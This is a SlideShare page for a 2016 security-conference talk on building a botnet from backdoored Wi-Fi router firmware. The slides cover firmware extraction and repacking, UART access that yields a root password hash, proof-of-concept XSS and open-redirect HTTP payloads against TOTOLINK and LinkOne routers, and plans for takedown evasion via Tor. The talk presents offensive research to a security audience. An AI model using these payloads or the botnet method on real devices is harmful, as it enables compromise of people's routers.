SlideShare ist ein Scribd-Unternehmen logo

C&C Botnet Factory

Nullbyte Security Conference
Nullbyte Security Conference

Palestra realizada por Toronto Garcez aka torontux durante a 3a. edição da Nullbyte Security Conference em 26 de novembro de 2016. Resumo: O objetivo da apresentação é demonstrar de forma prática, o passo-a-passo para criar uma botnet com roteadores wi-fi e/ou embarcados em geral. Será demonstrado o desenvolvimento de um comando e controle e a utilização de firmwares "backdorados" para tornar dispositivos em bots.

Technologie
1 von 27
Downloaden Sie, um offline zu lesen
NullByte-C0n C&C B0tn3t F4ct0ry by: Torontux 10111 00101 00101 01001 01010 10101 00101 01010 10101 00101 01010 10111 00101 00101 01001 01010 10101 00101 01010 10101 00101 01010
# whoami * Toronto Garcez aka Torontux * Pentester * IoT cell leader * BWCon www.bwcon.com.br
# cat agenda.txt * Motivation * Firmwares - how to get? - binwalk + firmware-mod-kit - Cross Compiling, Malta, Busybox * Bugs + bugs + bugs ... * C&C (cec.rb + bn.rb) * Demo * Next steps
# wget http://pastebin.com/raw/0SNSvyjJ _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|__,_|___|_|_ |____/ __,_|___|_|_(_) A DIY Guide ,-._,-._ _,- o O_/; / , ` `| | -.,___, / ` `-.__/ / ,. / `-.__.-` ./ ' / /| ___ ,/ ` ( ( |.-"` '/ ` / ,, | _ | o/o / . , / / ( __`;-;'__`) `//'` `||` ` _// || __ _ _ _____ __ .-"-._,(__) .(__).-""-. | | | | |_ _| | / / | | |_| | | | | / / | | _ | | | | `'-------` `--------'` __| |_| |_| |_| |__ #antisec
# cat hacklog.txt “So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices. A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit.” “ I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device.”
# man firmwares * Download Firmware updates * Extract from serial(UART) * Looking for filesystem
# man firmwares * binwalk + hexdump + firmware-mod-kit * Look for big chunks of 00s or FFs delimiting the parts * Check for common compression stream patterns -> zlib: 78 01, 78 9C, 78 DA -> gzip: 1F 8B -> LZMA: 5D 00 00 80 * Offset to extract de filesystem * squashfs
# hexdump -c wr740nv6.bin |more 00000000 01 00 00 00 54 50 2d 4c 49 4e 4b 20 54 65 63 68 |....TP-LINK Tech | 00000010 6e 6f 6c 6f 67 69 65 73 00 00 00 00 76 65 72 2e |nologies....ver.| 00000020 20 31 2e 30 00 00 00 00 00 00 00 00 00 00 00 00 | 1.0............| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000040 07 40 00 06 00 00 00 01 00 00 00 00 df 34 0f 03 |.@...........4..| 00000050 18 76 7d 82 2f 96 05 35 43 b2 be 7b 00 00 00 00 |.v}./..5C..{....| 00000060 d6 3b e9 70 2e 5b ca 44 4a e9 a7 33 e1 d9 9b ee |.;.p.[.DJ..3....| 00000070 00 00 00 00 80 00 20 00 80 1c cf b0 00 3e 02 00 |...... ......>..| ... 00120200 68 73 71 73 53 02 00 00 74 d1 1c 56 00 00 02 00 |hsqsS...t..V....| 00120210 29 00 00 00 02 00 11 00 e0 00 01 00 04 00 00 00 |)...............| 00120220 0b 0b 5b 0e 00 00 00 00 2b e6 2a 00 00 00 00 00 |..[.....+.*.....| 00120230 23 e6 2a 00 00 00 00 00 ff ff ff ff ff ff ff ff |#.*.............| ...
# binwalk wr740nv6_br.bin DECIMAL HEX DESCRIPTION --------------------------------------------------------------------- 0 0x0 TP-Link firmware header, firmware version: 0.- 15447.3, ... 13424 0x3470 U-Boot version string, U-Boot 1.1.4 13472 0x34A0 CRC32 polynomial table, big endian 14784 0x39C0 uImage header, OS: Linux, CPU: MIPS, compression type: lzma, image name: "u-boot image" 14848 0x3A00 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 93336 bytes 131584 0x20200 TP-Link firmware header, firmware version: 0.0.3 132096 0x20400 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2495224 bytes 1180160 0x120200 Squashfs filesystem, little endian, version 4.0... # dd if=wr740nv6_br.bin skip=1 bs=1180160 of=filesystem.squashfs 2+1 registros de entrada 2+1 registros de saída 2883584 bytes (2,9 MB) copiados, 0,0106605 s, 270 MB/s # file filesystem.squashfs filesystem.squashfs: Squashfs filesystem, little endian, version 4.0,
# binwalk -e wr740nv6_br.bin DECIMAL HEX DESCRIPTION -------------------------------------------------------------------------- 0 0x0 TP-Link firmware header, firmware version: 0.-15447.3, ... ... 1180160 0x120200 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2811435 bytes, 595 inodes, blocksize: 131072 bytes, created: 2015-10-13 09:40:04 total 52K 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 bin 4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 dev 4,0K drwxr-xr-x 7 root root 4,0K Set 21 2015 etc 4,0K drwxr-xr-x 5 root root 4,0K Set 21 2015 lib 0 lrwxrwxrwx 1 root root 11 Nov 15 13:57 linuxrc -> bin/busybox 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 mnt 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 proc 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 root 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sbin 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sys 4,0K drwxrwxrwt 2 root root 4,0K Set 21 2015 tmp 4,0K drwxr-xr-x 4 root root 4,0K Set 21 2015 usr 4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 var 4,0K drwxr-xr-x 10 root root 4,0K Out 13 2015 web # ls -lhs _wr740nv6_br.bin.extracted/squashfs-root/
# binwalk wr720nv2-en-up.bin DECIMAL HEXADECIMAL DESCRIPTION ------------------------------------------------------------------ 20 0x14 IMG0 (VxWorks) header, size: 1559872 26740 0x6874 VxWorks operating system version "5.5.1" , compiled: "Jun 18 2013, 12:19:11" 26836 0x68D4 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 636256 bytes 262292 0x40094 IMG0 (VxWorks) header, size: 1297600 262420 0x40114 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3657936 bytes 1256228 0x132B24 Wind River management filesystem, compressed, 194 files 1265584 0x134FB0 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 14696 bytes 1268652 0x135BAC LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 629 bytes 1268992 0x135D00 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 2731 bytes
# man firmware-mod-kit ./extract-firmware.sh wr740nv6_br.bin fmk/rootfs/ fmk/new-filesystem.squashfs fmk/logs/config.log fmk/logs/binwalk.log fmk/image_parts/header.img fmk/image_parts/rootfs.img ./build-firmware.sh fmk/new-firmware.bin
# man cross compiling |grep mips * gcc-mips-linux-gnu * -static option (Will increase size) * strip * Tks Rafael Machado ;) root@debian-mips:~# ls -lhsa 4,0K drwx------ 5 root root 4,0K Nov 25 18:18 . 4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 .. 664K -rwxr-xr-x 1 root root 657K Nov 25 18:18 teste root@debian-mips:~# strip teste 4,0K drwx------ 5 root root 4,0K Nov 25 18:18 . 4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 .. 608K -rwxr-xr-x 1 root root 604K Nov 25 18:19 teste
# man qemu |grep mips * https://www.linux-mips.org/wiki/MIPS_Malta * Debian Squeeze and Wheezy mips images for QEMU: https://people.debian.org/~aurel32/qemu/mips/ qemu-system-mips -M malta -m 256 -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -vnc 172.16.68.128:0 -net nic -net user,hostfwd=tcp::2222-:22 root@172.16.68.128's password: Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips Last login: Fri Nov 25 17:19:33 2016 root@debian-mips:~# root@debian-mips:~# uname -a Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips GNU/Linux
# cd busybox && make menuconfig
# man UART TP-Link TL-WR841ND - 2 detachable antennas - 4 Port 100/10 Switch - 1 Port 100/10 Wan Interface - 4 MB Flash - 32 MB Ram - WPS Button - Wi-Fi On/Off Button * Tks Osvaldo! ;)
# man UART * Find RX/TX/GND/VCC * VCC 3v3 * GND 0,0 * TX about 3v * Velocity 115200 cat /etc/shadow root:$1$GTN.gpri$DlSyKvZKMR9A9Uj9e9wR3/:15502:0:99999:7:::
# cat bugs.txt * looking for bugs: - Web applications (XSS,CSRF,LFI,RCE,etc...) - Memory Corruptions - Hardcoded passwords and Default credentials - Backdoors - Information disclosures
# cat totolink_payload.txt POST /login.cgi HTTP/1.1 Host: 192.168.1.1 Referer: http://192.168.1.1/login.htm Cookie: SessionID= username=admin&password=%22%3E%3Cscript%3Ealert%28%22NullByte %22%29%3B%3C%2Fscript%3E&submit.htm%3Flogin.htm=Send
# cat linkOne_payloads.txt GET /goform/SafeWanWebMan? GO=system_remote.asp&RMEN=1&port=8080&IP=0.0.0.0" %3balert(1)%2f%2f HTTP/1.1 Host: 192.168.0.1 Cookie: language=en; admin:language=en Connection: keep-alive POST /goform/SysStatusHandle HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Referer: http://192.168.0.1/system_status.asp Cookie: language=en; admin:language=en CMD=WAN_CON&GO=system_status.asp&action=;alert(1) ;
# cat linkOne_payloads2.txt Open Redirect -------------- GET /goform/SysStatusHandle? CMD=&GO=http://www.evil.com.br&action= HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q =0.9,*/*;q=0.8 Cookie: language=en; admin:language=en Connection: close
# man cec * Command and Control * Ruby * Client and Server (cec.rb and bn.rb) * HTTP * No frameworks(cgi)
# man cec - C&C C&C client bot.sh comands 5s 5s 5s
# ./demo
# cat next_steps.txt * Fix bugs * Code refactor * More features * Criptography * Clients to ARM / MIPS / etc... * TakeDown Evasion
# man tor2web * https://www.tor2web.org/ “Tor is a software project that lets you anonymously browse the Internet. Tor2web is a project to let Internet users access Tor Onion Services without using Tor Browser” * replace .onion with .onion.to or .onion.city or .onion.cab or .onion.direct Anonymity for the server • eqt5g4fuenphqinx.onion • End-to-end encryption
Questions?

Empfohlen

Hacking cable modems the later years
Hacking cable modems the later yearsHacking cable modems the later years
Hacking cable modems the later yearsNullbyte Security Conference
 
Windows's Kindnesses - Commoner to D-K(d)OM (Direct Kernel Object Manipulation)
Windows's Kindnesses - Commoner to D-K(d)OM (Direct Kernel Object Manipulation)Windows's Kindnesses - Commoner to D-K(d)OM (Direct Kernel Object Manipulation)
Windows's Kindnesses - Commoner to D-K(d)OM (Direct Kernel Object Manipulation)Nullbyte Security Conference
 
Vt6655 linux user_guide
Vt6655 linux user_guideVt6655 linux user_guide
Vt6655 linux user_guideMONTBUIAUTOESCOLA
 
CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)
CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)
CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)PROIDEA
 
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...RootedCON
 
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]RootedCON
 
Snort-IPS-Tutorial
Snort-IPS-TutorialSnort-IPS-Tutorial
Snort-IPS-TutorialVladimir Koychev
 
Metasploitable
MetasploitableMetasploitable
MetasploitableSri Manakula Vinayagar Engineering College
 

Empfohlen

Hacking cable modems the later years
Hacking cable modems the later yearsHacking cable modems the later years
Hacking cable modems the later yearsNullbyte Security Conference
 
Windows's Kindnesses - Commoner to D-K(d)OM (Direct Kernel Object Manipulation)
Windows's Kindnesses - Commoner to D-K(d)OM (Direct Kernel Object Manipulation)Windows's Kindnesses - Commoner to D-K(d)OM (Direct Kernel Object Manipulation)
Windows's Kindnesses - Commoner to D-K(d)OM (Direct Kernel Object Manipulation)Nullbyte Security Conference
 
Vt6655 linux user_guide
Vt6655 linux user_guideVt6655 linux user_guide
Vt6655 linux user_guideMONTBUIAUTOESCOLA
 
CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)
CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)
CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)PROIDEA
 
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...RootedCON
 
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]RootedCON
 
Snort-IPS-Tutorial
Snort-IPS-TutorialSnort-IPS-Tutorial
Snort-IPS-TutorialVladimir Koychev
 
Metasploitable
MetasploitableMetasploitable
MetasploitableSri Manakula Vinayagar Engineering College
 
U-boot and Android Verified Boot 2.0
U-boot and Android Verified Boot 2.0U-boot and Android Verified Boot 2.0
U-boot and Android Verified Boot 2.0GlobalLogic Ukraine
 
Snort
SnortSnort
Snortbala150985
 
移植FreeRTOS 之嵌入式軟體研究與開發
移植FreeRTOS 之嵌入式軟體研究與開發移植FreeRTOS 之嵌入式軟體研究與開發
移植FreeRTOS 之嵌入式軟體研究與開發艾鍗科技
 
DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)Michael Smith
 
How to twist a IPv6 over Bluetooth (6lowpan)
How to twist a IPv6 over Bluetooth (6lowpan) How to twist a IPv6 over Bluetooth (6lowpan)
How to twist a IPv6 over Bluetooth (6lowpan) Naoto MATSUMOTO
 
x86_64 Hardware Deep dive
x86_64 Hardware Deep divex86_64 Hardware Deep dive
x86_64 Hardware Deep diveNaoto MATSUMOTO
 
ARM Architecture and Meltdown/Spectre
ARM Architecture and Meltdown/SpectreARM Architecture and Meltdown/Spectre
ARM Architecture and Meltdown/SpectreGlobalLogic Ukraine
 
OpenWrt101 2007
OpenWrt101 2007OpenWrt101 2007
OpenWrt101 2007Rex Tsai
 
VYATTAによるマルチパスVPN接続手法
VYATTAによるマルチパスVPN接続手法VYATTAによるマルチパスVPN接続手法
VYATTAによるマルチパスVPN接続手法Naoto MATSUMOTO
 
SAS (Secure Active Switch)
SAS (Secure Active Switch)SAS (Secure Active Switch)
SAS (Secure Active Switch)Security Date
 
最後の楽園の開発をちょこっとだけ手伝った話
最後の楽園の開発をちょこっとだけ手伝った話最後の楽園の開発をちょこっとだけ手伝った話
最後の楽園の開発をちょこっとだけ手伝った話nullnilaki
 
Don't Get Hacked on Hostile WiFi
Don't Get Hacked on Hostile WiFiDon't Get Hacked on Hostile WiFi
Don't Get Hacked on Hostile WiFiMackenzie Morgan
 
Hardening Linux and introducing Securix Linux
Hardening Linux and introducing Securix LinuxHardening Linux and introducing Securix Linux
Hardening Linux and introducing Securix LinuxSecurity Session
 
Ganeti - build your own cloud
Ganeti - build your own cloudGaneti - build your own cloud
Ganeti - build your own cloudDobrica Pavlinušić
 
Aula 07 pino 1 e soquetes
Aula 07 pino 1 e soquetesAula 07 pino 1 e soquetes
Aula 07 pino 1 e soquetesAlexandrino Sitoe
 
SSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoSSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoTiago Cruz
 
Linux lv ms step by step
Linux lv ms step by stepLinux lv ms step by step
Linux lv ms step by stepsudakarman
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsAndrew Case
 
install mosquitto-auth-plug - cheat sheet -
install mosquitto-auth-plug - cheat sheet -install mosquitto-auth-plug - cheat sheet -
install mosquitto-auth-plug - cheat sheet -Naoto MATSUMOTO
 
Honeypots: Visão Geral
Honeypots: Visão GeralHoneypots: Visão Geral
Honeypots: Visão Geralbernardo_mr
 
Open stack pike-devstack-tutorial
Open stack pike-devstack-tutorialOpen stack pike-devstack-tutorial
Open stack pike-devstack-tutorialEueung Mulyana
 
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPFLinux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPFBrendan Gregg
 

Weitere ähnliche Inhalte

Was ist angesagt?

U-boot and Android Verified Boot 2.0
U-boot and Android Verified Boot 2.0U-boot and Android Verified Boot 2.0
U-boot and Android Verified Boot 2.0GlobalLogic Ukraine
 
移植FreeRTOS 之嵌入式軟體研究與開發
移植FreeRTOS 之嵌入式軟體研究與開發移植FreeRTOS 之嵌入式軟體研究與開發
移植FreeRTOS 之嵌入式軟體研究與開發艾鍗科技
 
DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)Michael Smith
 
How to twist a IPv6 over Bluetooth (6lowpan)
How to twist a IPv6 over Bluetooth (6lowpan) How to twist a IPv6 over Bluetooth (6lowpan)
How to twist a IPv6 over Bluetooth (6lowpan) Naoto MATSUMOTO
 
x86_64 Hardware Deep dive
x86_64 Hardware Deep divex86_64 Hardware Deep dive
x86_64 Hardware Deep diveNaoto MATSUMOTO
 
ARM Architecture and Meltdown/Spectre
ARM Architecture and Meltdown/SpectreARM Architecture and Meltdown/Spectre
ARM Architecture and Meltdown/SpectreGlobalLogic Ukraine
 
OpenWrt101 2007
OpenWrt101 2007OpenWrt101 2007
OpenWrt101 2007Rex Tsai
 
VYATTAによるマルチパスVPN接続手法
VYATTAによるマルチパスVPN接続手法VYATTAによるマルチパスVPN接続手法
VYATTAによるマルチパスVPN接続手法Naoto MATSUMOTO
 
SAS (Secure Active Switch)
SAS (Secure Active Switch)SAS (Secure Active Switch)
SAS (Secure Active Switch)Security Date
 
最後の楽園の開発をちょこっとだけ手伝った話
最後の楽園の開発をちょこっとだけ手伝った話最後の楽園の開発をちょこっとだけ手伝った話
最後の楽園の開発をちょこっとだけ手伝った話nullnilaki
 
Don't Get Hacked on Hostile WiFi
Don't Get Hacked on Hostile WiFiDon't Get Hacked on Hostile WiFi
Don't Get Hacked on Hostile WiFiMackenzie Morgan
 
Hardening Linux and introducing Securix Linux
Hardening Linux and introducing Securix LinuxHardening Linux and introducing Securix Linux
Hardening Linux and introducing Securix LinuxSecurity Session
 
SSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoSSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoTiago Cruz
 
Linux lv ms step by step
Linux lv ms step by stepLinux lv ms step by step
Linux lv ms step by stepsudakarman
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsAndrew Case
 
install mosquitto-auth-plug - cheat sheet -
install mosquitto-auth-plug - cheat sheet -install mosquitto-auth-plug - cheat sheet -
install mosquitto-auth-plug - cheat sheet -Naoto MATSUMOTO
 
Honeypots: Visão Geral
Honeypots: Visão GeralHoneypots: Visão Geral
Honeypots: Visão Geralbernardo_mr
 

Was ist angesagt? (20)

U-boot and Android Verified Boot 2.0
U-boot and Android Verified Boot 2.0U-boot and Android Verified Boot 2.0
U-boot and Android Verified Boot 2.0
 
Snort
SnortSnort
Snort
 
移植FreeRTOS 之嵌入式軟體研究與開發
移植FreeRTOS 之嵌入式軟體研究與開發移植FreeRTOS 之嵌入式軟體研究與開發
移植FreeRTOS 之嵌入式軟體研究與開發
 
DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)
 
How to twist a IPv6 over Bluetooth (6lowpan)
How to twist a IPv6 over Bluetooth (6lowpan) How to twist a IPv6 over Bluetooth (6lowpan)
How to twist a IPv6 over Bluetooth (6lowpan)
 
x86_64 Hardware Deep dive
x86_64 Hardware Deep divex86_64 Hardware Deep dive
x86_64 Hardware Deep dive
 
ARM Architecture and Meltdown/Spectre
ARM Architecture and Meltdown/SpectreARM Architecture and Meltdown/Spectre
ARM Architecture and Meltdown/Spectre
 
OpenWrt101 2007
OpenWrt101 2007OpenWrt101 2007
OpenWrt101 2007
 
VYATTAによるマルチパスVPN接続手法
VYATTAによるマルチパスVPN接続手法VYATTAによるマルチパスVPN接続手法
VYATTAによるマルチパスVPN接続手法
 
SAS (Secure Active Switch)
SAS (Secure Active Switch)SAS (Secure Active Switch)
SAS (Secure Active Switch)
 
最後の楽園の開発をちょこっとだけ手伝った話
最後の楽園の開発をちょこっとだけ手伝った話最後の楽園の開発をちょこっとだけ手伝った話
最後の楽園の開発をちょこっとだけ手伝った話
 
Don't Get Hacked on Hostile WiFi
Don't Get Hacked on Hostile WiFiDon't Get Hacked on Hostile WiFi
Don't Get Hacked on Hostile WiFi
 
Hardening Linux and introducing Securix Linux
Hardening Linux and introducing Securix LinuxHardening Linux and introducing Securix Linux
Hardening Linux and introducing Securix Linux
 
Ganeti - build your own cloud
Ganeti - build your own cloudGaneti - build your own cloud
Ganeti - build your own cloud
 
Aula 07 pino 1 e soquetes
Aula 07 pino 1 e soquetesAula 07 pino 1 e soquetes
Aula 07 pino 1 e soquetes
 
SSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoSSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso Remoto
 
Linux lv ms step by step
Linux lv ms step by stepLinux lv ms step by step
Linux lv ms step by step
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory Forensics
 
install mosquitto-auth-plug - cheat sheet -
install mosquitto-auth-plug - cheat sheet -install mosquitto-auth-plug - cheat sheet -
install mosquitto-auth-plug - cheat sheet -
 
Honeypots: Visão Geral
Honeypots: Visão GeralHoneypots: Visão Geral
Honeypots: Visão Geral
 

Ähnlich wie C&C Botnet Factory

Open stack pike-devstack-tutorial
Open stack pike-devstack-tutorialOpen stack pike-devstack-tutorial
Open stack pike-devstack-tutorialEueung Mulyana
 
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPFLinux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPFBrendan Gregg
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Kernel Recipes 2017 - Performance analysis Superpowers with Linux BPF - Brend...
Kernel Recipes 2017 - Performance analysis Superpowers with Linux BPF - Brend...Kernel Recipes 2017 - Performance analysis Superpowers with Linux BPF - Brend...
Kernel Recipes 2017 - Performance analysis Superpowers with Linux BPF - Brend...Anne Nicolas
 
Kernel Recipes 2017: Performance Analysis with BPF
Kernel Recipes 2017: Performance Analysis with BPFKernel Recipes 2017: Performance Analysis with BPF
Kernel Recipes 2017: Performance Analysis with BPFBrendan Gregg
 
OSSNA 2017 Performance Analysis Superpowers with Linux BPF
OSSNA 2017 Performance Analysis Superpowers with Linux BPFOSSNA 2017 Performance Analysis Superpowers with Linux BPF
OSSNA 2017 Performance Analysis Superpowers with Linux BPFBrendan Gregg
 
Percona Live UK 2014 Part III
Percona Live UK 2014 Part IIIPercona Live UK 2014 Part III
Percona Live UK 2014 Part IIIAlkin Tezuysal
 
bcc/BPF tools - Strategy, current tools, future challenges
bcc/BPF tools - Strategy, current tools, future challengesbcc/BPF tools - Strategy, current tools, future challenges
bcc/BPF tools - Strategy, current tools, future challengesIO Visor Project
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptxssuserfcf43f
 
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoringOSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoringNETWAYS
 
FreeLix: Semplicità & Controllo
FreeLix: Semplicità & ControlloFreeLix: Semplicità & Controllo
FreeLix: Semplicità & ControlloValerio Balbi
 
Linux+sensor+device-tree+shell=IoT !
Linux+sensor+device-tree+shell=IoT !Linux+sensor+device-tree+shell=IoT !
Linux+sensor+device-tree+shell=IoT !Dobrica Pavlinušić
 
[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVR[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVROpenStack Korea Community
 
Network Adapter Deep dive
Network Adapter Deep diveNetwork Adapter Deep dive
Network Adapter Deep diveNaoto MATSUMOTO
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and moreBrendan Gregg
 
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全維泰 蔡
 

Ähnlich wie C&C Botnet Factory (20)

Open stack pike-devstack-tutorial
Open stack pike-devstack-tutorialOpen stack pike-devstack-tutorial
Open stack pike-devstack-tutorial
 
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPFLinux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPF
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Kernel Recipes 2017 - Performance analysis Superpowers with Linux BPF - Brend...
Kernel Recipes 2017 - Performance analysis Superpowers with Linux BPF - Brend...Kernel Recipes 2017 - Performance analysis Superpowers with Linux BPF - Brend...
Kernel Recipes 2017 - Performance analysis Superpowers with Linux BPF - Brend...
 
Kernel Recipes 2017: Performance Analysis with BPF
Kernel Recipes 2017: Performance Analysis with BPFKernel Recipes 2017: Performance Analysis with BPF
Kernel Recipes 2017: Performance Analysis with BPF
 
OSSNA 2017 Performance Analysis Superpowers with Linux BPF
OSSNA 2017 Performance Analysis Superpowers with Linux BPFOSSNA 2017 Performance Analysis Superpowers with Linux BPF
OSSNA 2017 Performance Analysis Superpowers with Linux BPF
 
Percona Live UK 2014 Part III
Percona Live UK 2014 Part IIIPercona Live UK 2014 Part III
Percona Live UK 2014 Part III
 
Basic Linux kernel
Basic Linux kernelBasic Linux kernel
Basic Linux kernel
 
bcc/BPF tools - Strategy, current tools, future challenges
bcc/BPF tools - Strategy, current tools, future challengesbcc/BPF tools - Strategy, current tools, future challenges
bcc/BPF tools - Strategy, current tools, future challenges
 
BPF Tools 2017
BPF Tools 2017BPF Tools 2017
BPF Tools 2017
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoringOSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
 
Quic illustrated
Quic illustratedQuic illustrated
Quic illustrated
 
FreeLix: Semplicità & Controllo
FreeLix: Semplicità & ControlloFreeLix: Semplicità & Controllo
FreeLix: Semplicità & Controllo
 
Linux+sensor+device-tree+shell=IoT !
Linux+sensor+device-tree+shell=IoT !Linux+sensor+device-tree+shell=IoT !
Linux+sensor+device-tree+shell=IoT !
 
[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVR[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVR
 
Network Adapter Deep dive
Network Adapter Deep diveNetwork Adapter Deep dive
